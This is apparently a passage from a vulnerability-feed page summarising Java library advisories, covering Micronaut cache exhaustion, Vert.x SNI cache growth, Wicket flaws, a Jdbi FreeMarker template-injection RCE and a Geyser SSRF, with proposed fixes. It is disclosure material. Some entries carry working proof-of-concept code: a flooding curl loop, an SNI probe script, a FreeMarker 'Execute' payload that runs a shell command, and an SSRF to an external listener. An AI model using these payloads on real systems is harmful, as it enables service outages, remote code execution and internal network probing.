Each request with a novel `en-x-XXXXXX` private-use tag inserts a new `DateTimeFormatter` entry into the unbounded map. Each `DateTimeFormatter` (with locale metadata) occupies roughly 2–10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with `OutOfMemoryError: Java heap space`.

## Impact
- An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a `@Format`-annotated temporal type parameter — a documented, first-class framework feature.
- Memory grows linearly with the number of unique `Accept-Language` values sent. The BCP 47 private-use namespace (`en-x-ANYTHING`) provides millions of distinct valid locale strings.
- No credentials, special permissions, or exploitation of application logic are required — only the ability to send HTTP requests with custom headers.
- `TimeConverterRegistrar` is active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.

## Recommended Fix
Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded `ConcurrentHashMap` with a bounded `ConcurrentLinkedHashMap`:

```java
// In TimeConverterRegistrar.java — replace line 123
import io.micronaut.core.util.clhm.ConcurrentLinkedHashMap;

private static final int MAX_FORMATTERS_CACHE_SIZE = 100;

private final Map<String, DateTimeFormatter> formattersCache =
    new ConcurrentLinkedHashMap.Builder<String, DateTimeFormatter>()
        .maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE)
        .build();
```

Alternatively, since `@Format` pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:

```java
// In getFormatter() — cache only by pattern, apply locale at use-time
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
    DateTimeFormatter base = formattersCache.computeIfAbsent(
        pattern, p -> DateTimeFormatter.ofPattern(p)
    );
    Locale locale = context.getLocale();
    return locale != null ? base.withLocale(locale) : base;
}
```

This second approach bounds the cache by the number of distinct `@Format` patterns in the application, which is always small and finite, fully eliminating the attack surface.

Affected versions

4.10.0, 4.10.1, 4.10.10, 4.10.11, 4.10.12

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Low
📦 io.micronaut:micronaut-inject 📌 1.0.0, 1.0.0.RC3, 1.0.1, 1.0.2, 1.0.3 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary `ResourceBundleMessageSource` maintains two caches: `messageCache` (bounded at 100 entries via `ConcurrentLinkedHashMap`) and `bundleCache` (unbounded `ConcurrentHashMap`). The `bundleCache` is keyed by `(Locale, baseName)` where the locale originates from the HTTP `A...
📅 2026-05-06 OSV/Maven 🔗 Details

Full description

## Summary
`ResourceBundleMessageSource` maintains two caches: `messageCache` (bounded at 100 entries via `ConcurrentLinkedHashMap`) and `bundleCache` (unbounded `ConcurrentHashMap`). The `bundleCache` is keyed by `(Locale, baseName)` where the locale originates from the HTTP `Accept-Language` header. In applications that explicitly register a `ResourceBundleMessageSource` bean and serve HTML error responses, an unauthenticated attacker can exhaust heap memory by sending requests with large numbers of unique `Accept-Language` values, each causing a new entry in the unbounded `bundleCache`. Unlike GHSA-2hcp-gjrf-7fhc and the sibling `messageCache` (both bounded), `bundleCache` was not updated to use a bounded cache implementation.

## Details
The `bundleCache` is initialized in `inject/src/main/java/io/micronaut/context/i18n/ResourceBundleMessageSource.java` at line 150:

```java
// ResourceBundleMessageSource.java:139-152
protected Map<MessageKey, Optional<String>> buildMessageCache() {
    return new ConcurrentLinkedHashMap.Builder<MessageKey, Optional<String>>()
        .maximumWeightedCapacity(100) // ← BOUNDED ✓
        .build();
}

protected Map<MessageKey, Optional<ResourceBundle>> buildBundleCache() {
    return new ConcurrentHashMap<>(18); // ← UNBOUNDED ✗
}
```

The `resolveBundle()` method at line 169 inserts into `bundleCache` with no eviction policy:

```java
// ResourceBundleMessageSource.java:169-185
private Optional<ResourceBundle> resolveBundle(Locale locale) {
    MessageKey key = new MessageKey(locale, baseName);
    final Optional<ResourceBundle> resourceBundle = bundleCache.get(key);
    if (resourceBundle != null) {
        return resourceBundle;
    } else {
        Optional<ResourceBundle> opt;
        try {
            opt = Optional.of(ResourceBundle.getBundle(baseName, locale, getClassLoader()));
        } catch (MissingResourceException e) {
            opt = Optional.empty();
        }
        bundleCache.put(key, opt); // NO SIZE CHECK — unbounded growth
        return opt;
    }
}
```

The attack path requires:

1. The application registers a `ResourceBundleMessageSource` bean (non-default, requires explicit user configuration).
2. The attacker sends requests that trigger HTML error responses — i.e., requests with `Accept: text/html` to any URL that returns an error (e.g., 404 for any non-existent path).
3. Each request uses a unique `Accept-Language` value (e.g., `zz-AA`, `zz-AB`, …).
4. `DefaultHtmlErrorResponseBodyProvider.error()` calls `messageSource.getMessage(code, locale)` → `CompositeMessageSource` delegates to `ResourceBundleMessageSource` → `resolveBundle(locale)` inserts one entry per unique locale into `bundleCache`.

For locales that don't match any bundle file, `ResourceBundle.getBundle()` throws `MissingResourceException` and `Optional.empty()` is stored — a low-cost sentinel. For locales that DO match a bundle, a full `ResourceBundle` object is retained in memory. In either case, the map itself and the `MessageKey` objects grow without bound.

Note: the `messageCache` is bounded at 100 entries but does not prevent `bundleCache` growth, as `resolveBundle()` is called directly (bypassing `messageCache`) whenever a `messageCache` miss occurs.

## PoC
Against a Micronaut application with a `ResourceBundleMessageSource` bean registered (e.g., `@Bean ResourceBundleMessageSource messages() { return new ResourceBundleMessageSource("messages"); }`):

```bash
# Flood bundleCache with unique locales via HTML error path
for i in $(seq 1 100000); do
  curl -s -o /dev/null \
    -H "Accept: text/html" \
    -H "Accept-Language: zz-$(printf '%04d' $i)" \
    "http://localhost:8080/nonexistent-path-$(printf '%06d' $i)" &
  [ $((i % 200)) -eq 0 ] && wait
done
wait
```

Each unique `zz-XXXX` tag creates one new `bundleCache` entry. The `MessageKey` (Locale + baseName) and map overhead cost approximately 100-200 bytes per entry. At 100,000 entries, heap consumption from the cache alone reaches roughly 20 MB — significant in resource-constrained deployments. If a locale matches a bundle file, retained `ResourceBundle` objects cost substantially more per entry.

## Impact
- Only affects applications that explicitly register a `ResourceBundleMessageSource` bean (not the default configuration).
- Requires the ability to send HTTP requests with `Accept: text/html` headers and control over the `Accept-Language` value.
- Memory grows approximately 100-200 bytes per novel locale (for non-matching locales) up to several KB per locale if bundles are found. Sustained attack over time causes gradual heap exhaustion.
- Partial availability impact (A:L) under sustained attack in long-running services.

## Recommended Fix
Apply the same bounded-cache pattern used for the sibling `messageCache`:

```java
// In ResourceBundleMessageSource.java — replace buildBundleCache()
protected Map<MessageKey, Optional<ResourceBundle>> buildBundleCache() {
    return new ConcurrentLinkedHashMap.Builder<MessageKey, Optional<ResourceBundle>>()
        .maximumWeightedCapacity(50) // small — one entry per (locale, baseName)
        .build();
}
```

The number of distinct resource bundle files is bounded at compile time; a limit of 50 entries is more than sufficient for any realistic i18n configuration while fully preventing unbounded growth.

Affected versions

1.0.0, 1.0.0.RC3, 1.0.1, 1.0.2, 1.0.3

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

6.9/10 Medium
📦 io.vertx:vertx-core 📌 4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.3.8 ⛓️‍💥 Supply chain attack ☕ Java Maven library ⚡ Certificate Validation 🎯 Remote ⚪ Not exploited
💬 Potential unbounded server-side SNI `SslContext` cache growth in Vert.x TLS handling, with possible resource-exhaustion / DoS impact. On affected versions, matching server-side SNI names are cached via `computeIfAbsent(serverName, ...)` in a serverName-keyed `SslContext` cache, ...
📅 2026-05-06 NVD 🔗 Details

Full description

Potential unbounded server-side SNI `SslContext` cache growth in Vert.x TLS handling, with possible resource-exhaustion / DoS impact. On affected versions, matching server-side SNI names are cached via `computeIfAbsent(serverName, ...)` in a serverName-keyed `SslContext` cache, and I could not find any bound, TTL, or eviction for that cache. The implementation differs slightly by branch, but the same sink appears to be present in released versions `4.3.4` through `5.0.8`:

- `4.3.x`: `SSLHelper`
- `4.4.x` / `4.5.x`: `SslChannelProvider`
- `5.0.x` and current `master`: `SslContextProvider`

It appears that when server-side SNI is enabled, and wildcard or otherwise broad hostname mappings are used, an unauthenticated client can send many distinct matching SNI names and cause the server to retain increasing numbers of `SslContext` entries over time, leading to increasing memory consumption and possible DoS conditions. A check was performed on the related TCP SNI path across affected versions, the QUIC SNI path on `5.x`, and the wildcard hostname resolution helpers used during certificate selection.

## Steps to reproduce
1. Configure a Vert.x server with `setSsl(true)` and `setSni(true)`.
2. Use a keystore or mapping where many distinct SNI names match a wildcard or similarly broad rule.
3. Send repeated connections with distinct matching SNI values.
4. Observe that the SNI cache size grows with the number of unique matching names.

Local observations:

- initial `sniEntrySize()` = `0`
- after 20 unique matching names: `20`
- after 40 unique matching names: `40`
- repeating previously seen matching names did not grow the cache further
- non-matching SNI names did not create new cache entries

## What are the affected versions?
Affected released versions confirmed on `origin`:

- `4.3.4` through `4.3.8`
- `4.4.0` through `4.4.9`
- `4.5.0` through `4.5.25`
- `5.0.0` through `5.0.8`

Not affected by the same sink:

- `4.0.x` through `4.2.x`
- `4.3.0` through `4.3.3`

## Are there any ways to mitigate this issue?
- Disable server-side SNI if it is not needed.
- Avoid wildcard or otherwise high-cardinality hostname mappings where feasible.
- Apply connection or rate limiting in front of the service.
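Step 3 of the reproduction can be driven with a short client that completes one TLS handshake per distinct SNI name. A sketch — host, port, and the name list are placeholders for a local test setup, and certificate checks are disabled on the assumption that the test server's wildcard certificate is self-signed:

```python
import socket
import ssl

def probe_sni(host: str, port: int, names) -> None:
    """Open one TLS connection per distinct SNI name; on an affected
    server each new matching name adds an SslContext cache entry."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # test setup: self-signed wildcard cert
    ctx.verify_mode = ssl.CERT_NONE
    for name in names:
        try:
            with socket.create_connection((host, port), timeout=2) as raw:
                with ctx.wrap_socket(raw, server_hostname=name):
                    pass  # the handshake alone exercises the SNI lookup
        except (ssl.SSLError, OSError):
            pass  # refused/rejected names are skipped; matches still count
```

Watching `sniEntrySize()` (or heap growth) while feeding, say, `f"host{i}.example.com"` for increasing `i` reproduces the observations listed above.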

Affected versions

4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.3.8

Vulnerability type

CWE-295 — Certificate Validation

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

6.5/10 Medium
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ Server ☕ Java Maven library ⚡ Path Traversal 🎯 Remote ⚪ Not exploited
💬 FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbi...
📅 2026-05-06 NVD 🔗 Details

Full description

FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbitrary locations on the server. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.
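The general defense for this class of bug is to canonicalize the client-supplied name and confirm the result stays inside the upload root. A minimal sketch (illustrative only — `safe_join` is not Wicket's actual fix, and the directory names are placeholders):

```python
from pathlib import Path

def safe_join(base_dir: str, client_file_name: str) -> Path:
    """Neutralize path traversal in an upload file name: drop any
    directory components, then verify the resolved target is still
    under the upload root."""
    base = Path(base_dir).resolve()
    # Path(...).name keeps only the final component, discarding ../ prefixes
    target = (base / Path(client_file_name).name).resolve()
    if target == base or base not in target.parents:
        raise ValueError("file name escapes the upload directory")
    return target
```

The same check applies to any identifier that is interpolated into a filesystem path, such as the `uploadFieldId` parameter mentioned above.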

Affected versions

8.0.0 - 8.17.0

Vulnerability type

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

7.5/10 High
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ Server ☕ Java Maven library ⚡ Info Disclosure 🎯 Remote ⚪ Not exploited
💬 Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the iss...
📅 2026-05-06 NVD 🔗 Details

Full description

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.

Affected versions

8.0.0 - 8.17.0

Vulnerability type

CWE-200 — Info Disclosure

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.1/10 Medium
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ Server ☕ Java Maven library ⚡ XSS 🎯 Remote ⚪ Not exploited
💬 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes t...
📅 2026-05-06 NVD 🔗 Details

Full description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.
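The defect class named here — emitting untrusted input into generated markup without neutralization — is mitigated by escaping at output time. A generic sketch of the principle (not Wicket's fix; Wicket components normally escape model strings unless escaping has been explicitly disabled):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape &, <, >, and quotes so untrusted text renders as text,
    never as markup or script."""
    return "<p>" + html.escape(user_input, quote=True) + "</p>"
```

Escaping must happen at the point of output, in the encoding of the surrounding context (HTML body, attribute, URL, or script), rather than by trying to strip "dangerous" characters on input.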

Affected versions

8.0.0 - 8.17.0

Vulnerability type

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

9.1/10 Critical
📦 wicket 🏢 apache 📌 8.0.0 - 8.17.0 🗄️ Server ☕ Java Maven library ⚡ Session Fixation 🎯 Remote ⚪ Not exploited
💬 Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to ...
📅 2026-05-06 NVD 🔗 Details

Full description

Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue.
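The fix pattern for session fixation is the same in any stack: issue a fresh session identifier at the moment of authentication, which is what the servlet-level `changeSessionId` call does. A language-agnostic sketch with an in-memory store (illustrative only, not Wicket code):

```python
import secrets

def login(session_store: dict, presented_session_id: str, user: str) -> str:
    """Rotate the session id on login so an attacker-planted id
    stops referring to the now-authenticated session."""
    data = session_store.pop(presented_session_id, {})  # invalidate the old id
    data["user"] = user
    new_id = secrets.token_urlsafe(32)  # fresh, unguessable identifier
    session_store[new_id] = data
    return new_id
```

Because the pre-login id is removed from the store, an attacker who fixed that id in the victim's browser (e.g. via a crafted link) is left holding a key that no longer maps to any session.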

Affected versions

8.0.0 - 8.17.0

Vulnerability type

CWE-384 — Session Fixation

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Critical
📦 com.arcadedb:arcadedb-server 📌 21.10.1, 21.10.2, 21.11.1, 21.12.1, 21.9.1 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact Authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed: (1) ServerSecurityUser.getDatabaseUser() returned a DB user with an uninitialized fileAcces...
📅 2026-05-05 OSV/Maven 🔗 Details

Full description

### Impact
Authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed:

1. `ServerSecurityUser.getDatabaseUser()` returned a DB user with an uninitialized `fileAccessMap`, which `requestAccessOnFile` treated as allow-all.
2. `ArcadeDBServer.createDatabase()` omitted `factory.setSecurity(...)`, so any database created via `POST /api/v1/server {"command":"create database X"}` had its entire record-level authorization system silently disabled.

In combination, record-level and database-level authorization could be bypassed by any authenticated principal.

### Patches
Upgrade to version 26.4.2.

### Resources
https://github.com/ArcadeData/arcadedb/commit/04110c06315da55604ac107f71fe7182f3a3deb8

Affected versions

21.10.1, 21.10.2, 21.11.1, 21.12.1, 21.9.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

High
📦 org.jdbi:jdbi3-freemarker 📌 3.10.0, 3.10.0-rc1, 3.10.1, 3.11.0, 3.11.1 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # Summary **Description** An Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using `jdbi3-freemarker` permits attacker-influenced text to reach `FreemarkerEngine.parse(...
📅 2026-05-05 OSV/Maven 🔗 Details

الوصف الكامل

# Summary **Description** An Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336) vulnerability in Jdbi allows arbitrary command execution when an application using `jdbi3-freemarker` permits attacker-influenced text to reach `FreemarkerEngine.parse()` as template source. This affects `org.jdbi:jdbi3-freemarker` through version 3.52.1. The developer opts into FreeMarker-backed SQL templating, but does not explicitly opt into reflective Java class loading from template source. Jdbi’s FreeMarker integration should not expose unrestricted Java class instantiation by default in a SQL templating module. While the SQL injection risk is acknowledged, Jdbi’s documentation explicitly supports and demonstrates dynamic SQL templating through defined attributes, including substitution of non-bindable SQL elements such `ORDER BY` columns. ## Details Jdbi constructs the underlying `freemarker.template.Configuration` with `DEFAULT_INCOMPATIBLE_IMPROVEMENTS` and never installs a `TemplateClassResolver`, so Freemarker's legacy `UNRESTRICTED_RESOLVER` remains active and the `?new` built-in can instantiate arbitrary classes, including `freemarker.template.utility.Execute`. 
Two `Configuration` instances are constructed in the module, neither of which is hardened:

```java
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerConfig.java
public FreemarkerConfig() {
    freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
    freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
    freemarkerConfiguration.setNumberFormat("computer");
}
```

```java
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerSqlLocator.java
static {
    Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
    c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
    c.setNumberFormat("computer");
    CONFIGURATION = c;
}
```

The locator's `CONFIGURATION` is initialized once at class load and used by the deprecated static `findTemplate(Class, String)`. It cannot be replaced via `FreemarkerConfig#setFreemarkerConfiguration(...)`, so any fix must land in both call sites.

The sink is `FreemarkerEngine.parse()`, which constructs a `Template` from the raw SQL string and renders it against `ctx.getAttributes()`:

```java
// freemarker/src/main/java/org/jdbi/v3/freemarker/FreemarkerEngine.java
Template template = new Template(null, sqlTemplate,
        config.get(FreemarkerConfig.class).getFreemarkerConfiguration());
return Optional.of(ctx -> {
    StringWriter writer = new StringWriter();
    template.process(ctx.getAttributes(), writer);
    return writer.toString();
});
```

FreeMarker is the only built-in engine whose parse path provides reflective class loading by default.

## Impact

This impacts all `jdbi3-freemarker` releases through 3.52.1.
Exploitation requires that an application depend on `jdbi3-freemarker` and allow request-derived text to flow into a SQL template body passed to `Handle.createQuery(String)`, `createUpdate(String)`, `createCall(String)`, `createScript(String)`, or `Batch.add(String)`, or into a defined attribute that the template subsequently re-evaluates with `?eval` or `?interpret`. An application that allows attacker-influenced text to become FreeMarker template source, either directly through a SQL string passed to Jdbi or indirectly through a trusted template that applies `?eval` / `?interpret` to an attacker-influenced defined attribute, can become an RCE sink in the application JVM.

## Proposed Patch

The injection surface is the `Configuration` constructed by Jdbi on the application's behalf without a class-resolver policy. `FreemarkerConfig` and `FreemarkerSqlLocator`'s static initializer should not allow SQL templates to instantiate arbitrary Java classes by default. Callers that genuinely need reflective `?new` can override the `Configuration` via `FreemarkerConfig#setFreemarkerConfiguration(...)`. The static `CONFIGURATION` field cannot be reconfigured by application code at runtime, so a fix limited to `FreemarkerConfig` leaves the legacy locator path exploitable.
```java
import freemarker.core.TemplateClassResolver;

// FreemarkerConfig.java
public FreemarkerConfig() {
    freemarkerConfiguration = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
    freemarkerConfiguration.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
    freemarkerConfiguration.setNumberFormat("computer");
    freemarkerConfiguration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
}

// FreemarkerSqlLocator.java
static {
    Configuration c = new Configuration(Configuration.DEFAULT_INCOMPATIBLE_IMPROVEMENTS);
    c.setTemplateLoader(new ClassTemplateLoader(selectClassLoader(), "/"));
    c.setNumberFormat("computer");
    c.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
    CONFIGURATION = c;
}
```

`ALLOWS_NOTHING_RESOLVER` rejects every `?new` lookup, which is sufficient for SQL templating. `SAFER_RESOLVER` also closes RCE and blocks only `Execute`, `ObjectConstructor`, and `JythonRuntime`, none of which a SQL template would ever need. A complete hardening also restricts the template loader to a non-root prefix.

## Proof of Concept

This PoC uses direct string concatenation to simulate an application passing un-sanitized, request-derived text to the SQL template engine. The same RCE payload works if the attacker input is passed through a Jdbi `@Define` attribute that the template subsequently evaluates.
```bash
# Create project directory
mkdir jdbi-freemarker-poc && cd jdbi-freemarker-poc

cat > pom.xml << 'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>poc</groupId>
  <artifactId>jdbi-freemarker-poc</artifactId>
  <version>1.0</version>
  <properties>
    <maven.compiler.release>17</maven.compiler.release>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.jdbi</groupId>
      <artifactId>jdbi3-core</artifactId>
      <version>3.52.1</version>
    </dependency>
    <dependency>
      <groupId>org.jdbi</groupId>
      <artifactId>jdbi3-freemarker</artifactId>
      <version>3.52.1</version>
    </dependency>
    <dependency>
      <groupId>com.h2database</groupId>
      <artifactId>h2</artifactId>
      <version>2.2.224</version>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.13.0</version>
      </plugin>
    </plugins>
  </build>
</project>
EOF

mkdir -p src/main/java
cat > src/main/java/Server.java << 'EOF'
import com.sun.net.httpserver.HttpServer;
import org.jdbi.v3.core.Jdbi;
import org.jdbi.v3.core.statement.SqlStatements;
import org.jdbi.v3.freemarker.FreemarkerEngine;
import java.net.InetSocketAddress;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;

public class Server {
    public static void main(String[] args) throws Exception {
        Jdbi jdbi = Jdbi.create("jdbc:h2:mem:poc;DB_CLOSE_DELAY=-1");
        jdbi.getConfig(SqlStatements.class)
            .setTemplateEngine(FreemarkerEngine.instance());
        jdbi.useHandle(h -> {
            h.execute("create table users (id int, email varchar)");
            h.execute("insert into users values (1,'alice@example.com'),(2,'bob@example.com')");
        });
        HttpServer http = HttpServer.create(new InetSocketAddress(8050), 0);
        http.createContext("/search", ex -> {
            String q = parseQuery(ex.getRequestURI().getRawQuery()).getOrDefault("q", "");
            String sql = "select email from users where email like '%" + q + "%'";
            String body;
            try {
                body = jdbi.withHandle(h -> h.createQuery(sql).mapTo(String.class).list().toString());
            } catch (Exception e) {
                body = "error: " + e.getMessage();
            }
            byte[] bytes = body.getBytes(StandardCharsets.UTF_8);
            ex.sendResponseHeaders(200, bytes.length);
            ex.getResponseBody().write(bytes);
            ex.close();
        });
        http.start();
        System.out.println("listening on http://127.0.0.1:8050/search?q=...");
    }

    private static Map<String, String> parseQuery(String raw) {
        Map<String, String> out = new HashMap<>();
        if (raw == null) return out;
        for (String pair : raw.split("&")) {
            int eq = pair.indexOf('=');
            if (eq < 0) continue;
            out.put(URLDecoder.decode(pair.substring(0, eq), StandardCharsets.UTF_8),
                    URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8));
        }
        return out;
    }
}
EOF

mvn -q package
java -cp "target/classes:$(mvn -q dependency:build-classpath -Dmdep.outputFile=/dev/stdout)" Server &
```

Benign request:

```bash
$ curl -s 'http://127.0.0.1:8050/search?q=alice'
[alice@example.com]
```

Exploit:

```bash
$ curl -sG 'http://127.0.0.1:8050/search' \
    --data-urlencode 'q=<#assign ex="freemarker.template.utility.Execute"?new()>${ex("touch /tmp/jdbi-pwned")}'
[alice@example.com, bob@example.com]

$ ls -la /tmp/jdbi-pwned
-rw-r--r-- 1 wodzen wodzen 0 Apr 27 02:21 /tmp/jdbi-pwned
```

Affected versions

3.10.0, 3.10.0-rc1, 3.10.1, 3.11.0, 3.11.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Low
📦 org.geysermc.geyser:core 📌 All versions < 2.9.3 ⛓️‍💥 Supply chain attack ☕ Java Maven library ⚡ SSRF 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET req...
📅 2026-05-05 OSV/Maven 🔗 Details

Full description

### Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser's handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

### Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure. When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

### PoC

1. **Setup environment:**
   - Set up a Minecraft server (Paper/Spigot) with the latest version of Geyser installed.
   - Ensure you have a Bedrock client connected.
2. **Prepare listener:**
   - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`).
3. **Construct payload:**
   - Create a JSON payload pointing to your listener URL: `{"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}`
   - Encode this JSON string to Base64. *(You can use a terminal command: `echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64`)*
4. **Execute command:**
   - Run the following command in the Bedrock Edition client: `/give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]`
5. **Verify:**
   - Check the webhook.site dashboard.
   - You will see an **HTTP GET request originating from the Minecraft server's IP address**, not the client's IP.

### Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.
#### Affected Parties

- Minecraft servers running Geyser
- Server operators exposing internal or cloud metadata endpoints

#### Potential Impacts

- Internal network probing (e.g., intranet services, admin panels)
- Cloud metadata access attempts (e.g., 169.254.169.254)
- IP address disclosure of the Minecraft server
- Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

- Network mapping
- Firewall bypass attempts
- Cloud environment fingerprinting
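The payload construction in PoC step 3 can be sketched in Python; the webhook URL here is the same placeholder used in the PoC:

```python
import base64
import json

# Sketch of PoC step 3: the textures JSON pointing at the listener URL is
# Base64-encoded before being pasted into the /give command's profile
# property. The webhook URL is a placeholder for the attacker's listener.
def build_textures_payload(listener_url: str) -> str:
    textures = {"textures": {"SKIN": {"url": listener_url}}}
    return base64.b64encode(json.dumps(textures).encode()).decode()

payload = build_textures_payload("https://webhook.site/YOUR-UUID")
```

The resulting string goes into the `value:"[PASTE_BASE64_HERE]"` slot of the `/give` command.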

Affected versions

All versions < 2.9.3

Vulnerability type

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

Unspecified
📦 io.netty:netty-codec-http 🏢 netty 📌 4.0.0.Alpha1, 4.0.0.Alpha2, 4.0.0.Alpha3, 4.0.0.Alpha4, 4.0.0.Alpha5 🎬 Media ☕ Java Maven library ⚡ CWE-93 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setU...
📅 2026-05-05 OSV/Maven 🔗 Details

Full description

### Summary

